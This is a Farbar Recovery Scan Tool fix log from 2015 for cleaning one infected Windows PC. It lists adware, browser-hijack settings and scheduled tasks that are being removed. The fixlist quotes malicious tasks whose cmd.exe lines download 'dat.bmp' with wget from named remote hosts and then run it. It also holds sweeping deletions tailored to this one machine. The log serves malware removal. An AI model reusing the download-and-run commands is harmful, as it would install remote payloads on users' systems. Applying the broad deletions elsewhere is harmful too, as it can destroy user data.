Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 04-02-2015 01
Ran by Proteus at 2015-02-05 16:55:42 Run:1
Running from C:\Users\Proteus\Desktop\FRST2
Loaded Profiles: UpdatusUser & Proteus (Available profiles: UpdatusUser & Proteus)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
CloseProcesses:
CreateRestorePoint:
Task: {49ACE010-577E-4A92-BC37-A396BD06DD3C} - System32\Tasks\SYSTEMDOWN => cmd.exe /R cd "C:\ProgramData" &amp; ping 1.1.1.1 -n 350 -w 1000 &amp; wget -t 0 --retry-connrefused -O dat.bmp http://sdshdb.nl/index.php?data=XhyuslHf2k;up;1421852599 &amp; start cmd /R dat.bmp
Task: {52BD9ED5-BE48-4C77-B61E-69F2B29FA155} - System32\Tasks\SYSTEMUP => cmd.exe /R cd "C:\ProgramData" &amp; ping 1.1.1.1 -n 350 -w 1000 &amp; wget -t 0 --retry-connrefused -O dat.bmp http://iashdb.in/index.php?data=iUbbj8phSd;up;1421852589 &amp; start cmd /R dat.bmp
Task: {7A0BED88-1594-4021-8842-72AD25A9A43B} - System32\Tasks\{1C57B201-D7B9-445A-90ED-7F1E2614E4A6} => pcalua.exe -a C:\Users\Proteus\AppData\Roaming\awesomehp\UninstallManager.exe
Task: {7DCC40B8-FC2C-4903-8585-D5A44E56A190} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" &amp; ping 1.1.1.1 -n 300 -w 1000 &amp; wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=9a9CS535Ou;camtasia.exe;1421836212 &amp; start cmd /R dat.bmp <==== ATTENTION
Task: {70055F6B-23A1-442B-86EC-6D69DFADECC6} - System32\Tasks\EasyPartitionManager => C:\Windows\MSetup\BA46-12225A02\EPM.exe
Startup: C:\Users\Proteus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M-Kernel_a69.zip.lnk
S3 cpuz130; \??\C:\Users\Proteus\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X]
S3 cpuz135; \??\C:\windows\TEMP\cpuz135\cpuz135_x64.sys [X]
HKLM-x32\...\Run: [fst_pl_81] => [X]
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Andy] => C:\Program Files\Andy\HandyAndy.exe
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\...\Run: [] => [X]
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp220141121
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
HKU\S-1-5-21-1866740971-3537411966-2138577161-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=NIS&pvid=21.5.0.19
HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
SearchScopes: HKU\S-1-5-21-1866740971-3537411966-2138577161-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={sear
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKU\S-1-5-21-1866740971-3537411966-2138577161-1001: @tools.google.com/Google Update;version=3 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKU\S-1-5-21-1866740971-3537411966-2138577161-1001: @tools.google.com/Google Update;version=9 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
C:\ProgramData\*.*
C:\ProgramData\{1b30cb05-82b9-9e5a-1b30-0cb0582b2c16}
C:\ProgramData\{d0a5e402-7f84-7b8f-d0a5-5e4027f89009}
C:\ProgramData\{d0a5e402-7f84-7b8f-d0a5-5e4027f89009}
C:\ProgramData\Temp
C:\Users\Proteus\AppData\Local\Google\Chrome
C:\Users\Proteus\Desktop\FOLDERY\PROGRAMY\Samsung Kies.lnk
C:\Users\Proteus\Downloads\*(*)-dp*.exe
C:\windows\SysWOW64\AMD64
C:\windows\SysWOW64\X86
Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f
Reg: reg delete HKCU\Software\Google\Chrome /f
Reg: reg delete HKLM\SOFTWARE\Google\Chrome /f
Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Chrome /f
Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f
Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f
Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f
CMD: sc config "PLAY ONLINE. RunOuc" start= disabled
EmptyTemp:
*****************

Processes closed successfully.
Restore point was successfully created.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{49ACE010-577E-4A92-BC37-A396BD06DD3C}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{49ACE010-577E-4A92-BC37-A396BD06DD3C}" => Key deleted successfully.
C:\Windows\System32\Tasks\SYSTEMDOWN => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SYSTEMDOWN" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{52BD9ED5-BE48-4C77-B61E-69F2B29FA155}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{52BD9ED5-BE48-4C77-B61E-69F2B29FA155}" => Key deleted successfully.
C:\Windows\System32\Tasks\SYSTEMUP => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SYSTEMUP" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7A0BED88-1594-4021-8842-72AD25A9A43B}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7A0BED88-1594-4021-8842-72AD25A9A43B}" => Key deleted successfully.
C:\Windows\System32\Tasks\{1C57B201-D7B9-445A-90ED-7F1E2614E4A6} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{1C57B201-D7B9-445A-90ED-7F1E2614E4A6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7DCC40B8-FC2C-4903-8585-D5A44E56A190}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7DCC40B8-FC2C-4903-8585-D5A44E56A190}" => Key deleted successfully.
C:\Windows\System32\Tasks\SYSTEM => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SYSTEM" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{70055F6B-23A1-442B-86EC-6D69DFADECC6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{70055F6B-23A1-442B-86EC-6D69DFADECC6}" => Key deleted successfully.
C:\Windows\System32\Tasks\EasyPartitionManager => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\EasyPartitionManager" => Key deleted successfully.
C:\Users\Proteus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M-Kernel_a69.zip.lnk not found.
cpuz130 => Service deleted successfully.
cpuz135 => Service deleted successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\fst_pl_81 => value deleted successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Andy => value deleted successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoControlPanel => value deleted successfully.
HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => Key deleted successfully.
HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => Key not found. 
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Value was restored successfully.
HKU\S-1-5-21-1866740971-3537411966-2138577161-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Error setting value.
HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\Software\Microsoft\Internet Explorer\Main\\Search Bar => value deleted successfully.
HKU\S-1-5-21-1866740971-3537411966-2138577161-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Value not found.
"HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => Key deleted successfully.
HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => Key not found. 
"HKLM\Software\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3" => Key deleted successfully.
C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll => Moved successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9" => Key deleted successfully.
C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll not found.
"HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\Software\MozillaPlugins\@tools.google.com/Google Update;version=3" => Key deleted successfully.
C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll => Moved successfully.
"HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\Software\MozillaPlugins\@tools.google.com/Google Update;version=9" => Key deleted successfully.
C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll not found.
"HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}" => Key deleted successfully.
"HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}" => Key deleted successfully.
"HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}" => Key deleted successfully.
"HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}" => Key deleted successfully.

"C:\ProgramData\*.*" directory move:

Could not move "C:\ProgramData\*.*" directory. => Scheduled to move on reboot.

C:\ProgramData\{1b30cb05-82b9-9e5a-1b30-0cb0582b2c16} => Moved successfully.
"C:\ProgramData\{d0a5e402-7f84-7b8f-d0a5-5e4027f89009}" => File/Directory not found.
"C:\ProgramData\{d0a5e402-7f84-7b8f-d0a5-5e4027f89009}" => File/Directory not found.
C:\ProgramData\Temp => Moved successfully.
C:\Users\Proteus\AppData\Local\Google\Chrome => Moved successfully.
C:\Users\Proteus\Desktop\FOLDERY\PROGRAMY\Samsung Kies.lnk => Moved successfully.
C:\Users\Proteus\Downloads\*(*)-dp*.exe => Moved successfully.
C:\windows\SysWOW64\AMD64 => Moved successfully.
C:\windows\SysWOW64\X86 => Moved successfully.

========= reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f =========

Operacja ukoäczona pomylnie.


========= End of Reg: =========


========= reg delete HKCU\Software\Google\Chrome /f =========

Operacja ukoäczona pomylnie.


========= End of Reg: =========


========= reg delete HKLM\SOFTWARE\Google\Chrome /f =========

Operacja ukoäczona pomylnie.


========= End of Reg: =========


========= reg delete HKLM\SOFTWARE\Wow6432Node\Google\Chrome /f =========

Operacja ukoäczona pomylnie.


========= End of Reg: =========


========= reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f =========

Operacja ukoäczona pomylnie.


========= End of Reg: =========


========= reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f =========

Operacja ukoäczona pomylnie.


========= End of Reg: =========


========= reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f =========

Operacja ukoäczona pomylnie.


========= End of Reg: =========


========= reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f =========

Operacja ukoäczona pomylnie.


========= End of Reg: =========


========= reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f =========

Operacja ukoäczona pomylnie.


========= End of Reg: =========


========= reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f =========

Operacja ukoäczona pomylnie.


========= End of Reg: =========


=========  sc config "PLAY ONLINE. RunOuc" start= disabled =========

[SC] ChangeServiceConfig SUKCES

========= End of CMD: =========

EmptyTemp: => Removed 4.1 GB temporary data.

=> Result of Scheduled Files to move (Boot Mode: Normal) (Date&Time: 2015-02-05 17:03:43)<=

"C:\ProgramData\*.*" => Directory could not move.

==== End of Fixlog 17:03:43 ====